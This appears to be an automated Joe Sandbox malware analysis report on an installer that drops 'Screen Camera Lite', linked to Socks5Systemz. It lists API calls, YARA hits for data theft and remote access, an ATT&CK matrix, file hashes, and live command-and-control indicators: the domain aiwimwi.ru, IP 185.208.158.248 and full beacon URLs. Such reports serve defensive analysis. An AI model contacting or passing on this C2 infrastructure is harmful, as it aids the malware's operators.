        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C900FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_02C900FE
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C900FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_02C900FE
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C7648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,2_2_02C7648B
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C89468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_02C89468
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478420
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E0AC
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C7F78E cpuid 2_2_02C7F78E
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: GetLocaleInfoA,0_2_004051FC
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: GetLocaleInfoA,0_2_00405248
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: GetLocaleInfoA,1_2_00408570
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: GetLocaleInfoA,1_2_004085BC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_0045892C
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00455588 GetUserNameA,1_2_00455588
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2965500570.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: screencameralite32_64.exe PID: 7088, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2965500570.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: screencameralite32_64.exe PID: 7088, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Deobfuscate/Decode Files or Information
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Service Execution
        5
        Windows Service
        1
        DLL Side-Loading
        2
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Bootkit
        1
        Access Token Manipulation
        21
        Software Packing
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
        Windows Service
        1
        Timestomp
        NTDS35
        System Information Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection
        1
        DLL Side-Loading
        LSA Secrets241
        Security Software Discovery
        SSHKeylogging112
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
        Virtualization/Sandbox Evasion
        DCSync121
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem11
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
        Process Injection
        /etc/passwd and /etc/shadow3
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Bootkit
        Network Sniffing1
        Remote System Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        AyiNxJ98mL.exe24%VirustotalBrowse
        SourceDetectionScannerLabelLink
        C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exe100%AviraHEUR/AGEN.1329998
        C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exe100%Joe Sandbox ML
        C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exe39%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-1EDIU.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-1EDIU.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-1OTIR.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-1OTIR.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-1VK0U.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-1VK0U.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-2B9OT.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-2B9OT.tmp1%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-2HDD5.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-2HDD5.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-3OVHD.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-3OVHD.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-4575S.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-4575S.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-5J0K7.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-5J0K7.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-6D3F1.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-6D3F1.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-6E6KU.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-6E6KU.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-6G4V1.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-6G4V1.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-9FMQR.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-9FMQR.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-9QCH4.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-9QCH4.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-A0F2H.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-A0F2H.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-AKS9J.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-AKS9J.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-CLVH5.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-CLVH5.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-DH98H.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-DH98H.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-GGBLB.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-GGBLB.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-HM1KV.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-HM1KV.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Screen Camera Lite\is-LI4GH.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Screen Camera Lite\is-LI4GH.tmp0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.innosetup.com/0%URL Reputationsafe
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        http://fsf.org/0%VirustotalBrowse
        http://mingw-w64.sourceforge.net/X0%VirustotalBrowse
        http://tukaani.org/xz/0%VirustotalBrowse
        http://www.gnu.org/licenses/0%VirustotalBrowse
        http://tukaani.org/0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        aiwimwi.ru
        185.208.158.248
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          aiwimwi.rutrue
            unknown
            http://aiwimwi.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412true
              unknown
              http://aiwimwi.ru/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf713c6ea96983ftrue
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/AyiNxJ98mL.tmp, AyiNxJ98mL.tmp, 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AyiNxJ98mL.tmp.0.dr, is-3VPQL.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                http://tukaani.org/is-OOQC3.tmp.1.drfalseunknown
                http://www.remobjects.com/psUAyiNxJ98mL.exe, 00000000.00000003.1712874171.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1713077693.00000000021D4000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AyiNxJ98mL.tmp.0.dr, is-3VPQL.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                http://tukaani.org/xz/is-OOQC3.tmp.1.drfalseunknown
                http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82dscreencameralite32_64.exe, 00000002.00000002.2964942696.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://mingw-w64.sourceforge.net/Xis-LI4GH.tmp.1.drfalseunknown
                  http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee948screencameralite32_64.exe, 00000002.00000002.2966103090.00000000037A4000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://www.remobjects.com/psAyiNxJ98mL.exe, 00000000.00000003.1712874171.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1713077693.00000000021D4000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, AyiNxJ98mL.tmp, 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AyiNxJ98mL.tmp.0.dr, is-3VPQL.tmp.1.drfalse
                    • URL Reputation: safe
                    unknown
                    http://fsf.org/AyiNxJ98mL.exe, 00000000.00000002.2964604196.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1712213221.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714448778.0000000002130000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964889635.000000000211C000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714366626.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964601742.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1716748546.00000000005EB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://www.gnu.org/licenses/AyiNxJ98mL.exe, 00000000.00000002.2964604196.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1712213221.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714448778.0000000002130000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964889635.000000000211C000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714366626.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964601742.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1716748546.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, is-MLNUS.tmp.1.drfalseunknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.208.158.248
                    aiwimwi.ruSwitzerland
                    34888SIMPLECARRER2ITtrue
                    89.105.201.183
                    unknownNetherlands
                    24875NOVOSERVE-ASNLfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1527568
                    Start date and time:2024-10-07 03:40:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 9s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:AyiNxJ98mL.exe
                    renamed because original name is a hash value
                    Original Sample Name:1d579066d7524921e14164ea1e9a9807.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@5/70@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 92%
                    • Number of executed functions: 195
                    • Number of non-executed functions: 250
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    21:41:38API Interceptor486540x Sleep call for process: screencameralite32_64.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.208.158.2480IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                      2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                        Dw0MqzrLWq.exeGet hashmaliciousSocks5SystemzBrowse
                          noode.exeGet hashmaliciousSocks5SystemzBrowse
                            eCh9R4T214.exeGet hashmaliciousSocks5SystemzBrowse
                              noode.exeGet hashmaliciousSocks5SystemzBrowse
                                file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                  Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                                    L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                                      noode.exeGet hashmaliciousSocks5SystemzBrowse
                                        89.105.201.183cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 200
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        NOVOSERVE-ASNLpTQN2MIbjQ.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        0IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        Dw0MqzrLWq.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        noode.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                        • 89.105.201.183
                                        L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        noode.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                        • 89.105.201.183
                                        SecuriteInfo.com.Gen.Heur.Munp.1.20199.21407.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 89.105.201.183
                                        SIMPLECARRER2ITpTQN2MIbjQ.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.196.8.214
                                        0IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.208.158.248
                                        2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.208.158.248
                                        Dw0MqzrLWq.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.208.158.248
                                        noode.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.208.158.248
                                        eCh9R4T214.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.208.158.248
                                        noode.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.208.158.248
                                        file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                        • 185.208.158.248
                                        https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                        • 185.208.158.9
                                        Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                                        • 185.208.158.248
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Screen Camera Lite\is-1EDIU.tmppTQN2MIbjQ.exeGet hashmaliciousSocks5SystemzBrowse
                                          0IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                                            2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                                              Dw0MqzrLWq.exeGet hashmaliciousSocks5SystemzBrowse
                                                noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                  eCh9R4T214.exeGet hashmaliciousSocks5SystemzBrowse
                                                    noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                      file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                        Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                                                          L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                                                            Process:C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3532800
                                                            Entropy (8bit):6.72752696267436
                                                            Encrypted:false
                                                            SSDEEP:98304:yID4fjP9DDJlFIc6BcRT7L28gPnL2K2bAmJOIM/z:yID4bPvGcRTP2TnL2K2bAmJOIM/z
                                                            MD5:9773013A29C2D339FD5258A117195F58
                                                            SHA1:78FE3C2CE6FB4A99180054FEA22F3F107125FB94
                                                            SHA-256:014C98BB48D95C970040FE90CF927439D699496820342948156718B688576426
                                                            SHA-512:4DA9C80E69DCC79266774FE81E63652162884CAE982F56AA9815F534EA478097DC5F55E11E9B2091249626ECC01D7FE335343F16AF128121D8DFDE5FBCD30ACB
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Virustotal, Detection: 39%, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...n..L.................."..j.......z"......."...@..........................P6.....0.6.....................................D.".......#...............................................................................".h............................text.....".......".................`....rdata...(...."..*....".............@..@.data....t....#..0....".............@....rsrc.........#.......#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):8
                                                            Entropy (8bit):2.0
                                                            Encrypted:false
                                                            SSDEEP:3:1n:1n
                                                            MD5:B087735DAAA97B35D72D290ADDFC9510
                                                            SHA1:DE0FC797F74AADE2EDA5D8D1729C08FE819FEBA8
                                                            SHA-256:61A166DA78A557180720DE49F4D4BEA85C41E235C30F61579CDBDACB0AF7D489
                                                            SHA-512:97325B3009B291B293D3BDF258DA8B65A98E0FC572FF7B57EF7B549E89A61480CA3D07946055EB4B500880C31D58989633CD0F4D8D13AEF61082C6B25B12CB93
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:l<.g....
                                                            Process:C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):0.8112781244591328
                                                            Encrypted:false
                                                            SSDEEP:3:rln:x
                                                            MD5:AC8AAAEA2B609745C410ABC9C2FC3851
                                                            SHA1:52E1620DF4D296AF2BF31B954FE972DB03894A1C
                                                            SHA-256:A71962744B947463B61084E87B378F086EA8F9EE7178F55D12E7100CFA23F22D
                                                            SHA-512:7EF39F57B23B64E34C268BB1E9F336CD8B2FAADBC540B22E07714CF92DCF93A4ED790525BDE5095F69B6D105A7E928DDDFF64BBB60EBC865A75BA1622FAB12CE
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:V...
                                                            Process:C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):128
                                                            Entropy (8bit):2.9545817380615236
                                                            Encrypted:false
                                                            SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                            MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                            SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                            SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                            SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                            Process:C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):128
                                                            Entropy (8bit):1.7095628900165245
                                                            Encrypted:false
                                                            SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                            MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                            SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                            SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                            SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):92019
                                                            Entropy (8bit):5.974787373427489
                                                            Encrypted:false
                                                            SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                            MD5:CC7DAD980DD04E0387795741D809CBF7
                                                            SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                            SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
